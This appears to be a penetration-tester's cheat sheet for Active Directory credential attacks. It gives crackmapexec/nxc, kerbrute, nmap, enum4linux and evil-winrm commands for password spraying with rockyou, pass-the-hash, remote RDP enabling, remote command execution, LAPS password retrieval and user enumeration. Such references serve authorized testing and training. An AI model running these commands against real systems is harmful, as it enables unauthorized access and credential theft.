# Credentials

## **SMB**

crackmapexec smb <target_ip> (ports 135, 139 or 445)

### crackmapexec

{% code overflow="wrap" %}

```bash
crackmapexec smb <target_ip> -u <username> -p <password>
crackmapexec smb <target_ip> -u <username> -p <password> --shares
# a range of IPs can be given instead of a single target
crackmapexec smb 192.168.1.1-100 -u <username> -p <password> --shares
crackmapexec smb <target_ip> -u <userslist> -p <passwordlist> --shares

crackmapexec smb 10.10.10.1 -u 'john' -p 'password123' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

# enable RDP
crackmapexec smb <target_ip> -u <username> -p <password> -M rdp -o ACTION=enable
# spider_plus is a crackmapexec SMB module that writes the paths of all readable files into a JSON file
crackmapexec smb <target_ip> -u <username> -p <password> -M spider_plus
# show the content of a file found that way (-x runs a cmd command on the target)
crackmapexec smb 192.168.1.50 -d wargrey.mon -u Administrator -p h3ckt0r -x "more <filepath>"

# keep testing after a valid pair is found (--continue is accepted as an abbreviation of this flag)
crackmapexec smb 10.10.144.122 -u users -p /usr/share/wordlists/rockyou.txt --continue-on-success
```

{% endcode %}

## **LDAP**

```bash
# Check whether accounts exist (-k switches to Kerberos authentication; empty password)
crackmapexec ldap 192.168.1.0/24 -u users.txt -p '' -k
# Test credentials (password or NT hash)
crackmapexec ldap 192.168.1.0/24 -u user -p password
crackmapexec ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B
# Identify trust relationships and their direction
crackmapexec ldap <ip> -u user -p pass -M enum_trusts
```

## WinRM (or use nxc)

{% code overflow="wrap" %}

```bash
# Password spraying: user and password files are paired line by line, not tried in every combination
crackmapexec winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

# Test credentials
crackmapexec winrm 192.168.1.0/24 -u user -p password

# If the SMB port is closed, pass -d DOMAIN so that no SMB connection is attempted
crackmapexec winrm 192.168.1.0/24 -u user -p password -d DOMAIN
# Execute a PowerShell command over WinRM (-X); -x runs a cmd command instead
crackmapexec winrm 192.168.255.131 -u user -p 'password' -X whoami
# LAPS (Local Administrator Password Solution): on Server 2012 or older the local administrator password may be
# readable; with an account allowed to read it, --laps retrieves that password and authenticates with it
crackmapexec winrm <ip> -u user-can-read-laps -p pass --laps
```

{% endcode %}

```bash
nxc winrm 10.10.175.105 -u 'j.rock' -p 'Serviceworks1'
nxc smb 10.10.175.105 -u 'j.rock' -p 'Serviceworks1'
# enumerate domain users through RID cycling with the guest account
nxc smb 10.10.205.80 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser'
```

### Nmap

{% code overflow="wrap" %}

```bash
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
# supply a custom username list with userdb
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt" <IP>
```

{% endcode %}

{% hint style="info" %}
If the host is not joined to the domain, use nslookup instead.
{% endhint %}

### nslookup

{% code overflow="wrap" %}

```bash
nslookup <ip you want> <ip DNS>
# Windows cmd loop: reverse-resolve every host in the subnet against the given DNS server
# and print the name (computer or client) and IP of each one that resolves
for /L %i in (1,1,255) do @nslookup 192.168.1.%i <ip DNS> 2>nul | find "Name" && echo 192.168.1.%i
```

{% endcode %}

### enum4linux

```bash
enum4linux -a -u "user" -p "password" <DC IP>
```

### kerbrute

{% code overflow="wrap" %}

```bash
# Go kerbrute, from https://github.com/ropnop/kerbrute/releases
./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt
# the flat-flag form belongs to the Python kerbrute (TarlogicSecurity/kerbrute), which has no subcommands
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

{% endcode %}

### smbmap

### Find Domain Controller IP

```bash
nslookup -type=SRV _ldap._tcp.dc._msdcs.deathstar.rfs
```

### evil-winrm

```bash
evil-winrm -u j.rock@services.local -p Serviceworks1 --ip 10.10.175.105
```
